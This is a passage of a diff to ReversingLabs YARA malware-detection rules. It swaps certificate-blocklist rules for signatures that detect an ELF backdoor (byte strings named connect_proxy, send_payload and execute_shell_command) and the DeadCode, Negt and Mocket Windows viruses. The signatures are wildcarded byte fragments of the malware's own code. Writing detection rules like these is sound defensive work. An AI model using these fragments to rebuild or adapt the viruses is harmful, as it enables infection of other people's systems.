+            8D 59 ?? 4C 89 94 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 4C 89 8C 24 ?? ?? ?? ?? 48
+            0F 44 CB 00 C0 8B 84 24 ?? ?? ?? ?? 48 83 D9 ?? 48 89 94 24 ?? ?? ?? ?? 66 C7 84 24
+            ?? ?? 00 00 ?? ?? 48 29 E9 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
+            ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 4C 89 A4 24 ?? ?? ?? ?? 89
+            84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48
+            89 C6 4C 89 EF 48 89 C3 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? BF ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 DE F3 A6 74 ??
+            4C 89 E7 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
+            5B 5D 41 5C 41 5D C3
+        }
+		$execute_shell_command = {
+            41 57 48 89 FE 41 56 41 55 41 54 55 53 BB ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 85 FF
+            0F 84 ?? ?? ?? ?? BD ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48
+            89 E9 F3 48 A5 8B 06 48 89 CD B1 ?? 89 07 48 8D BC 24 ?? ?? ?? ?? 48 89 E8 F3 48 AB
+            31 FF E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 49 89 C6 48 89 DF 48 89 E8 48 8D 94 24 ?? ?? ??
+            ?? BE ?? ?? ?? ?? F3 48 AB 48 83 C2 ?? 48 89 DF E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89
+            DF E8 ?? ?? ?? ?? 48 85 C0 48 89 44 24 ?? 0F 84 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8D 9C
+            24 ?? ?? ?? ?? 4C 8D 7C 24 ?? 45 31 E4 31 ED E8 ?? ?? ?? ?? 31 D2 89 C7 41 89 C5 BE
+            ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 80 CC ?? BE ?? ?? ?? ?? 44 89 EF 89 C2 31 C0 E8 ??
+            ?? ?? ?? 0F 1F 44 00 ?? 31 C0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB BA ?? ?? ?? ?? 48 89
+            DE 44 89 EF E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 C0 74 ?? 44 8D 24 28 41 81 FC ?? ?? ??
+            ?? 77 ?? 89 ED 48 63 D0 48 89 DE 49 8D 3C 2F E8 ?? ?? ?? ?? 31 FF E8 ?? ?? ?? ?? 4C
+            29 F0 48 83 F8 ?? 0F 87 ?? ?? ?? ?? 44 89 E5 45 31 E4 EB ?? 0F 1F 84 00 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 38 ?? 75 ?? 41 83 C4 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 83 FC ??
+            0F 8E ?? ?? ?? ?? 41 89 EC BB ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? BF ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 45 85 E4 74 ?? 48 8D 7C 24 ?? 44 89 E6 E8 ?? ?? ?? ?? 48 81 C4 ??
+            ?? ?? ?? 89 D8 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OM-FAS d.o.o." and ( pe.signatures [ i ] . serial == "00:fd:41:e6:bd:74:28:d3:00:8c:8a:05:f6:8c:9a:c6:f2" or pe.signatures [ i ] . serial == "fd:41:e6:bd:74:28:d3:00:8c:8a:05:f6:8c:9a:c6:f2" ) and 1575590400 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( all of ( $connect_proxy_p* ) ) and ( $send_payload ) and ( $execute_shell_command )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C7079866C0E48B01246Ba0C148E70D4D : INFO FILE
+rule REVERSINGLABS_Win32_Virus_Deadcode : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects DeadCode virus."
 		author = "ReversingLabs"
-		id = "2c985bd9-cb2a-553a-af63-a2a0a80cc641"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "89ec2e39-a163-5ba6-9b19-9c94b1923d47"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5520-L5538"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/virus/Win32.Virus.DeadCode.yara#L3-L76"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cc144760e0ca21fd98b55ac222db540900def61f54e9644f8cab5f711ec7bf24"
+		logic_hash = "6ac2e48daaed222f0a19afd4d03a02834705e0e3762db3217f68569554171846"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Virus"
+		tc_detection_name = "DeadCode"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO GARANT" and ( pe.signatures [ i ] . serial == "00:c7:07:98:66:c0:e4:8b:01:24:6b:a0:c1:48:e7:0d:4d" or pe.signatures [ i ] . serial == "c7:07:98:66:c0:e4:8b:01:24:6b:a0:c1:48:e7:0d:4d" ) and 1588679105 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_D591Da22F33C800A7024Aecff2Cd6C6D : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "294cbf90-cd1f-5743-a51a-46e1d04ef34e"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5540-L5558"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "30e421d5ea3c5693c5c9bd0e3dd997ceda9755d17e3fb16d2a8e6c4a327ae32f"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$deadcode_ep_1 = {
+            64 67 FF 36 30 00 58 8B 40 08 FF 70 48 5B FF 70 4C 5A 03 40 44
+            FF E0
+        }
+		$deadcode_marker = {
+            DE C0 AD DE
+        }
+		$deadcode_ep_2 = {
+            2B C0 85 C0 74 0E 64 67 FF 36 00 00 64 67 89 26 00 00 89 00 E8
+            ED FF FF FF 8B 74 24 0C 64 67 A1 30 00 8B 40 08 8B 58 48 8B 50
+            4C 03 40 44 89 86 B8 00 00 00 89 86 B0 00 00 00 89 9E A4 00 00
+            00 89 96 A8 00 00 00 2B C0 C3
+        }
+		$deadcode_ep_3 = {
+            B8 DE C0 AD DE 50 5A 64 67 A1 30 00 8B 40 08 8B 58 48 8B 50 4C
+            03 40 44 FF D0
+        }
+		$deadcode_body_1 = {
+            8B D0 8B EA 81 C5 ?? ?? ?? ?? 89 85 A4 00 00 00 89 9D C0 00 00 00 E8 56 01 00 00 89
+            45 00 8D 75 04 81 C2 ?? ?? ?? ?? 6A 19 FF 75 00 52 56 E8 CE 01 00 00 64 67 A1 30 00
+            8B 40 08 89 85 88 00 00 00 C7 85 D0 00 00 00 ?? ?? ?? ?? E8 09 00 00 00 8B 64 24 08
+            E9 03 01 00 00 33 D2 64 FF 32 64 89 22 83 BD C0 00 00 00 00 75 2F 6A 04 68 00 10 00
+            00 68 40 01 00 00 6A 00 FF 55 08 50 8F 45 78 E8 2A 03 00 00 68 00 40 00 00 68 40 01
+            00 00 FF 75 78 FF 55 28 E9 C3 00 00 00 8B 85 A4 00 00 00 05 ?? ?? ?? ?? 8D B5 B4 00
+            00 00 56 6A 00 55 50 68 00 00 10 00 6A 00 FF 55 30 89 85 AC 00 00 00 6A 04 68 00 10
+            00 00 6A 54 6A 00 FF 55 08 89 85 A8 00 00 00 64 67 A1 30 00 8B 40 10 8B 40 3C 8B B5
+            A8 00 00 00 8D 7E 10 56 57 6A 00 6A 00 6A 04 6A 01 6A 00 6A 00 50 6A 00 FF 55 50 85
+            C0 74 5D FF 76 04 8F 85 B0 00 00 00 64 67 A1 30 00 8B 40 08 8B D8 03 5B 3C 8B 5B 28
+            03 D8 8B 8D A4 00 00 00 81 ?? ?? ?? ?? 8D 85 B4 00 00 00 50 6A ?? 51 53 FF 36 FF 55
+            4C FF 76 04 FF 55 54 8D B5 AC 00 00 00 6A FF 6A 01 56 6A 02 FF 55 34 68 00 40 00 00
+            6A 54 FF B5 A8 00 00 00 FF 55 28 33 D2 64 8F 02 5A E8 DB 01 00 00 E8 F5 00 00 00 6A
+            00 FF 55 3C 64 67 8B 36 00 00 AD 83 F8 FF 74 04 8B F0 EB F6 8B 7E 04 81 E7 00 00 FF
+            FF 66 81 3F 4D 5A 74 08 81 EF 00 00 01 00 EB F1 8B DF 03 5B 3C 66 81 3B 50 45 74 02
+            EB E3 8B C7 C3 55 8B EC 8B 75 0C AC 84 C0 75 FB 2B 75 0C 8B CE 8B 5D 08 03 5B 3C 8B
+            5B 78 03 5D 08 8B 53 20 03 55 08 2B C0 8B 32 03 75 08 8B 7D 0C 51 FC F3 A6 59 74 06
+        }
+		$deadcode_body_2 = {
+            83 C2 04 40 EB EB 8B 73 24 03 75 08 2B D2 66 8B 14 46 8B 73 1C 03 75 08 8B 04 96 03
+            45 08 8B E5 5D C2 08 00 55 8B EC 8B 7D 08 8B 75 0C 8B 4D 14 51 56 57 56 FF 75 10 E8
+            91 FF FF FF 5F 5E 59 AB AC 84 C0 75 FB E2 E9 8B E5 5D C2 10 00 8B 6C 24 04 6A 04 68
+            00 10 00 00 68 40 01 00 00 6A 00 FF 55 08 85 C0 74 18 89 45 78 E8 63 01 00 00 68 00
+            40 00 00 68 40 01 00 00 FF 75 78 FF 55 28 6A 00 FF 55 40 C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO T2 Soft" and ( pe.signatures [ i ] . serial == "00:d5:91:da:22:f3:3c:80:0a:70:24:ae:cf:f2:cd:6c:6d" or pe.signatures [ i ] . serial == "d5:91:da:22:f3:3c:80:0a:70:24:ae:cf:f2:cd:6c:6d" ) and 1588679107 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( $deadcode_ep_1 at pe.entry_point ) and ( $deadcode_marker at 0x40 ) ) or ( ( $deadcode_ep_2 at pe.entry_point ) and ( $deadcode_marker at 0x40 ) ) or ( ( $deadcode_ep_3 at pe.entry_point ) and ( $deadcode_marker at 0x40 ) ) or ( $deadcode_body_1 and $deadcode_body_2 ) )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B36E0F2053Caee9C3B966F7Be0B40Fc3 : INFO FILE
+rule REVERSINGLABS_Win32_Virus_Negt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Negt virus."
 		author = "ReversingLabs"
-		id = "8ed732ae-1c25-59fc-8ebe-50a1eb81e4a9"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "80e83105-dd98-5fad-9119-f851ec3199af"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5560-L5578"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/virus/Win32.Virus.Negt.yara#L3-L94"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2444c78aefdb9e8c8004598a318db016d7e781ede6da2ba3ee85316456c3e77b"
+		logic_hash = "43057ef111fc505678606386c8d428653da391f4b65844d81479ca05e3517346"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Virus"
+		tc_detection_name = "Negt"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PARTS-JEST d.o.o." and ( pe.signatures [ i ] . serial == "00:b3:6e:0f:20:53:ca:ee:9c:3b:96:6f:7b:e0:b4:0f:c3" or pe.signatures [ i ] . serial == "b3:6e:0f:20:53:ca:ee:9c:3b:96:6f:7b:e0:b4:0f:c3" ) and 1600172855 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_5B320A2F46C99C1Ba1357Bee : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "3912fdfc-7a84-51ce-abd2-977ad183af26"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5580-L5596"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "12797f80bce9d64c6c07e185aa309a0c4f910835745a7f2cc1874fb1211624d8"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$negt_body_and_infector_1 = {
+            6A 00 E8 99 08 00 00 A3 ?? ?? ?? ?? 68 04 01 00 00 68 ?? ?? ?? ?? 6A 00 E8 7D 08 00 00 6A 00 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? E8 48 08 00 00 BB 00 00 00 00 8D 05 ?? ?? ?? ?? FE 00 68 ?? ?? ?? ?? E8 2D 00 00 00 43 83 FB 18 7C E8 E8 92 08 00 00
+            3C 9F 7F 17 6A 01 68 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 6A 00 6A 00 E8 7D 08 00 00 6A 00 E8 10 08 00 00 55 8B EC 81 C4 B8
+            FD FF FF FF 75 08 E8 35 08 00 00 0B C0 0F 84 C2 00 00 00 8D 85 C2 FE FF FF 50 68 ?? ?? ?? ?? E8 F2 07 00 00 89 85 BC FE
+            FF FF 83 BD BC FE FF FF FF 0F 84 9E 00 00 00 8D 9D EE FE FF FF 53 E8 21 08 00 00 8B F3 BB 00 00 00 00 F7 D3 68 ?? ?? ??
+            ?? 56 E8 01 08 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 F4 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 E7 07 00 00 23 D8 68 ?? ?? ?? ??
+            56 E8 DA 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 CD 07 00 00 23 D8 83 FB 00 74 28 FF 75 08 68 ?? ?? ?? ?? E8 BF 07 00 00 8D
+            85 EE FE FF FF 50 68 ?? ?? ?? ?? E8 A2 07 00 00 68 ?? ?? ?? ?? E8 08 01 00 00 8D 85 C2 FE FF FF 50 FF B5 BC FE FF FF E8
+            50 07 00 00 83 F8 00 0F 85 62 FF FF FF FF B5 BC FE FF FF E8 30 07 00 00 8D 85 C2 FE FF FF 50 68 ?? ?? ?? ?? E8 25 07 00
+            00 89 85 BC FE FF FF 83 BD BC FE FF FF FF 0F 84 AF 00 00 00 8D BD C2 FE FF FF 8B 07 66 83 E0 10 0F 84 82 00 00 00 8D 9D
+        }
+		$negt_body_and_infector_2 = {
+            EE FE FF FF 53 E8 42 07 00 00 8B F3 BB 00 00 00 00 F7 D3 68 ?? ?? ?? ?? 56 E8 22 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 15
+            07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 08 07 00 00 23 D8 83 FB 00 74 41 FF 75 08 8D 85 B8 FD FF FF 50 E8 F8 06 00 00 8D 85
+            EE FE FF FF 50 8D 85 B8 FD FF FF 50 E8 D9 06 00 00 68 ?? ?? ?? ?? 8D 85 B8 FD FF FF 50 E8 C8 06 00 00 60 8D 85 B8 FD FF
+            FF 50 E8 63 FE FF FF 61 8D 85 C2 FE FF FF 50 FF B5 BC FE FF FF E8 72 06 00 00 83 F8 00 0F 85 51 FF FF FF FF B5 BC FE FF
+            FF E8 52 06 00 00 C9 C2 04 00 55 8B EC 81 C4 E4 E9 FF FF 51 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 68 00 00 00 C0 FF 75
+            08 E8 1E 06 00 00 83 F8 FF 75 05 E9 AE 03 00 00 89 45 FC 6A 00 6A 00 6A 3C FF 75 FC E8 45 06 00 00 6A 00 8D 45 F0 50 6A
+            04 8D 45 F4 50 FF 75 FC E8 25 06 00 00 6A 00 6A 00 FF 75 F4 FF 75 FC E8 22 06 00 00 6A 00 8D 45 F0 50 68 20 01 00 00 68
+            ?? ?? ?? ?? FF 75 FC E8 FE 05 00 00 8B 5D F4 83 EB 0B 6A 00 6A 00 53 FF 75 FC E8 F7 05 00 00 6A 00 8D 45 F0 50 6A 0B 68
+            ?? ?? ?? ?? FF 75 FC E8 D6 05 00 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 E5 05 00 00 0B C0 75 05 E9 12 03 00 00 81 3D ?? ??
+            ?? ?? 50 45 00 00 74 05 E9 01 03 00 00 0F B7 05 ?? ?? ?? ?? B9 28 00 00 00 F7 E1 03 45 F4 83 C0 18 0F B7 0D ?? ?? ?? ??
+            03 C1 83 C0 28 3B 05 ?? ?? ?? ?? 76 05 E9 D4 02 00 00 A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 0F B7
+        }
+		$negt_body_and_infector_3 = {
+            05 ?? ?? ?? ?? B9 28 00 00 00 F7 E1 83 C0 04 03 45 F4 83 C0 14 05 E0 00 00 00 89 45 EC C7 05 ?? ?? ?? ?? 2E 45 41 54 C7
+            05 ?? ?? ?? ?? 55 02 00 00 FF 35 ?? ?? ?? ?? 8F 05 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 99 F7 F1 40 F7 E1 A3 ??
+            ?? ?? ?? 8B 45 EC 83 E8 18 6A 00 6A 00 50 FF 75 FC E8 10 05 00 00 6A 00 8D 45 F0 50 6A 04 8D 45 E8 50 FF 75 FC E8 F0 04
+            00 00 6A 00 8D 45 F0 50 6A 04 8D 45 E4 50 FF 75 FC E8 DC 04 00 00 8B 45 E8 03 45 E4 A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 00
+            00 00 00 C7 05 ?? ?? ?? ?? 00 00 00 00 66 C7 05 ?? ?? ?? ?? 00 00 66 C7 05 ?? ?? ?? ?? 00 00 C7 05 ?? ?? ?? ?? 20 00 00
+            E0 6A 00 6A 00 FF 75 EC FF 75 FC E8 9E 04 00 00 6A 00 8D 45 F0 50 6A 28 68 ?? ?? ?? ?? FF 75 FC E8 8F 04 00 00 68 ?? ??
+            ?? ?? E8 61 04 00 00 68 ?? ?? ?? ?? E8 63 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 48 04 00 00 A3 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 33 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 1E 04 00 00
+            A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 09 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 F4 03
+            00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 DF 03 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
+            CA 03 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 B5 03 00 00 A3 ?? ?? ?? ?? 6A 02 6A 00 6A 00 FF 75 FC E8
+            BA 03 00 00 6A 00 8D 45 F0 50 FF 35 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 50 FF 75 FC E8 A5 03 00 00 66 FF 05 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 8B 0D ?? ?? ?? ?? 99 F7 F1 40 F7 E1 03 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A 00 6A 00
+        }
+		$negt_body_and_infector_4 = {
+            FF 75 F4 FF 75 FC E8 63 03 00 00 6A 00 8D 45 F0 50 68 F8 00 00 00 68 ?? ?? ?? ?? FF 75 FC E8 51 03 00 00 83 6D F4 0B 6A
+            00 6A 00 FF 75 F4 FF 75 FC E8 38 03 00 00 6A 00 8D 45 F0 50 6A 0B 68 ?? ?? ?? ?? FF 75 FC E8 29 03 00 00 6A 00 6A 20 6A
+            03 6A 00 6A 01 68 00 00 00 80 68 ?? ?? ?? ?? E8 C8 02 00 00 89 45 F8 6A 00 6A 00 6A 00 FF 75 F8 E8 F9 02 00 00 6A 00 8D
+            45 F0 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 F8 E8 D3 02 00 00 8B 75 F0 6A 02 6A 00 6A 00 FF 75 FC E8 CE 02 00 00
+            6A 00 8D 45 F0 50 56 8D 85 ?? ?? ?? ?? 50 FF 75 FC E8 BE 02 00 00 FF 75 FC E8 62 02 00 00 FF 75 F8 E8 5A 02 00 00 59 C9
+            C2 04 00 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 00 01 00 00 FF B5 ?? ?? ?? ?? 6A 00
+            FF 95 ?? ?? ?? ?? 6A 00 6A 20 6A 03 6A 00 6A 01 68 00 00 00 80 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A
+            00 6A 20 6A 02 6A 00 6A 03 68 00 00 00 C0 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 FF B5 ?? ?? ??
+            ?? FF 95 ?? ?? ?? ?? 2D ?? ?? ?? ?? 6A 00 6A 00 50 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 68 00
+            01 00 00 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 FB 00 74 1E 8D 85 ?? ?? ?? ?? 6A 00
+            50 53 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? EB B7 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
+            FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 C3
+        }
+		$negt_infector = {
+            E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 00 01 00 00 FF B5 ?? ?? ?? ?? 6A 00 FF 95 ??
+            ?? ?? ?? 6A 00 6A 20 6A 03 6A 00 6A 01 68 00 00 00 80 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 6A 20
+            6A 02 6A 00 6A 03 68 00 00 00 C0 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 FF B5 ?? ?? ?? ?? FF 95
+            ?? ?? ?? ?? 2D ?? ?? ?? ?? 6A 00 6A 00 50 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 68 00 01 00 00
+            FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 FB 00 74 1E 8D 85 ?? ?? ?? ?? 6A 00 50 53 FF
+            B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? EB B7 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ??
+            ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REGION TOURISM LLC" and pe.signatures [ i ] . serial == "5b:32:0a:2f:46:c9:9c:1b:a1:35:7b:ee" and 1602513116 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $negt_infector at pe.entry_point ) or ( ( $negt_body_and_infector_1 at pe.entry_point ) and $negt_body_and_infector_2 and $negt_body_and_infector_3 and $negt_body_and_infector_4 ) )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_08D4352185317271C1Cec9D05C279Af7 : INFO FILE
+rule REVERSINGLABS_Win32_Virus_Mocket : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Mocket virus."
 		author = "ReversingLabs"
-		id = "0165920f-5f4d-5b35-990d-120786b4c5ba"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "878c2162-9a79-52e6-af7b-95f9667f9e78"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5598-L5614"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/virus/Win32.Virus.Mocket.yara#L3-L58"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b240962ab23729b241413ed1e53ac6541bf6b8a673c57522efd0cfe0c7eb9dd4"
+		logic_hash = "af16974396efe7a1a46aa39b812482dcc49d0fe95db6640c1703db479e7ea9dc"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Virus"
+		tc_detection_name = "Mocket"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$mocket_body_1 = {
+            E8 00 00 00 00 5B 81 EB ?? ?? ?? ?? 8B 34 24 81 E6 00 00 FF FF E8 31 00 00 00 89 83 ?? ?? ?? ?? E8 4C 00 00 00 89 83 ??
+            ?? ?? ?? E8 A2 00 00 00 E8 CD 00 00 00 E8 05 01 00 00 87 CB E3 0C B8 ?? ?? ?? ?? 05 ?? ?? ?? ?? FF E0 C3 66 81 3E 4D 5A
+            75 0E 8B 7E 3C 03 FE 66 81 3F 50 45 75 02 96 C3 81 EE 00 00 01 00 81 FE 00 00 00 70 73 DD 33 C0 C3 8B 70 3C 03 F0 8B 76
+            78 03 F0 56 8B 76 20 03 F0 8B C6 33 D2 33 C9 8A 8B ?? ?? ?? ?? 8D BB ?? ?? ?? ?? 8B 34 02 03 B3 ?? ?? ?? ?? 83 C2 04 F3
+            A6 75 E2 5E 8B C6 83 EA 04 D1 EA 8B 40 24 03 83 ?? ?? ?? ?? 33 C9 66 8B 0C 02 8B C6 8B 40 1C 03 83 ?? ?? ?? ?? C1 E1 02
